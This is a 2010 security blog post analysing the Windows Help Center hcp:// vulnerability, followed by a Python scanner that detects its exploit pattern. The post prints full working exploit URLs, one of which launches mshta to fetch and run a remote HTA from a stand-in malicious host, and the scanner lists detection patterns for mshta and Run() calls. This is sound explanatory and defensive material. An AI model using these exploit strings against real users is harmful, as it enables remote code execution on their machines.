Sunday, August 29, 2010

HTA and Help Center Vulnerability

Attackers exploiting the infamous Help Center vulnerability have been using HTA files to download and execute malicious files on victim machines. Microsoft supports accessing help documents directly via URLs by installing a protocol handler for the "hcp" scheme. According to the Full Disclosure post, the vulnerability lies in a JavaScript file with insufficient escaping.

To exploit the Help Center vulnerability, all an attacker has to do is make the user click a link to, or visit, a malicious site that carries the exploit in an injected or purpose-built iframe. A working exploit is already available on most blogs and security sites.

hcp://services/search?query=anything&topic=hcp://system/sysinfo/sysinfomain.htm%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A..%5C..%5Csysinfomain.htm%u003fsvr=%3Cscript%20defer%3Eeval%28unescape%28%27Run%2528%2522calc.exe%2522%2529%27%29%29%3C/script%3E

The above is one of the many exploits available in the wild; it simply runs calc.exe when triggered. Attackers have found many ways to run malicious code through this vulnerability, one of which is the use of HTA files. The trick is to trigger the vulnerability in exactly the same way as above:

"hcp://services/search?query=anything&topic=hcp://system/sysinfo/sysinfomain.htm%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A%%A..%5C..%5Csysinfomain.htm%u003fsvr=%3Cscript/defer%3Eeval%28unescape%28%27Run%2528%2522mshta%2520http%253A//www.themaliciousurlhere/malicious.hta%2522%2529%27%29%29"

The above exploit uses the vulnerability to load a malicious HTA file by running the mshta command. The HTA file contains the malicious content to be executed; HTA files support WScript, which can be used to download and execute further malicious files.
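From the defender's side, the two exploit strings above share a recognisable shape, and the following added example (not code from the original post) turns it into a scanner for captured page content: it pulls out hcp:// links, percent-decodes the nested encoding, and reports which indicators each link matches. The function names, the indicator names and the sample page (which uses a placeholder .hta URL on example.invalid) are all constructed for this example.

```python
import re
from urllib.parse import unquote
# Indicators drawn from the hcp:// exploit strings in the post: the %A% run (the
# escaping trick), ..%5C traversal, %u003f smuggling '?', script/Run()/mshta in svr=.
INDICATORS = {
    "hcp_scheme":       re.compile(r"^hcp://", re.I),
    "escape_run":       re.compile(r"(?:%A%){3,}", re.I),
    "path_traversal":   re.compile(r"\.\.(?:%5C|\\|/)", re.I),
    "unicode_question": re.compile(r"%u003f", re.I),
    "script_in_svr":    re.compile(r"svr=.*<script", re.I | re.S),
    "mshta_launch":     re.compile(r"\bmshta\b", re.I),
    "run_call":         re.compile(r"\bRun\s*\(", re.I),
}
HCP_URL = re.compile(r"""hcp://[^\s"'<>]+""", re.I)

def fully_unquote(value: str, rounds: int = 3) -> str:
    """Percent-decode repeatedly; the payload nests encodings (%2522 -> %22 -> ")."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def analyse_hcp_url(url: str) -> dict:
    """Match the indicators against the raw and decoded URL and return a verdict."""
    decoded = fully_unquote(url)
    hits = sorted(name for name, rx in INDICATORS.items()
                  if rx.search(url) or rx.search(decoded))
    # Escaping trick plus traversal or injected script is the exploit shape.
    if "hcp_scheme" in hits and "escape_run" in hits and \
            {"path_traversal", "script_in_svr"} & set(hits):
        verdict = "exploit"
    elif "hcp_scheme" in hits and len(hits) > 1:
        verdict = "suspicious"
    else:
        verdict = "benign"          # includes an ordinary hcp:// help link
    return {"verdict": verdict, "indicators": hits, "decoded": decoded}

def scan_html(html: str) -> list:
    """Pull every hcp:// link (e.g. an iframe src) out of captured page content."""
    return [analyse_hcp_url(m.group(0)) for m in HCP_URL.finditer(html)]
# Constructed sample page (not a real site): one ordinary help link and one iframe
# carrying a shortened form of the exploit shape with a placeholder .hta URL.
SAMPLE_HTML = (
    '<a href="hcp://system/sysinfo/sysinfomain.htm">System info</a>\n'
    '<iframe src="hcp://services/search?query=anything&topic=hcp://system/sysinfo/sysinfomain.htm'
    '%A%%A%%A%%A%%A%..%5C..%5Csysinfomain.htm%u003fsvr=%3Cscript%20defer%3Eeval%28unescape%28%27'
    'Run%2528%2522mshta%2520http%253A//example.invalid/x.hta%2522%2529%27%29%29%3C/script%3E"></iframe>\n'
)
```

Running `scan_html(SAMPLE_HTML)` flags the iframe as an exploit with all seven indicators while the plain help link stays benign; the decoded field shows the final `Run("mshta ...")` call that the nested encoding hides from a naive string match.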
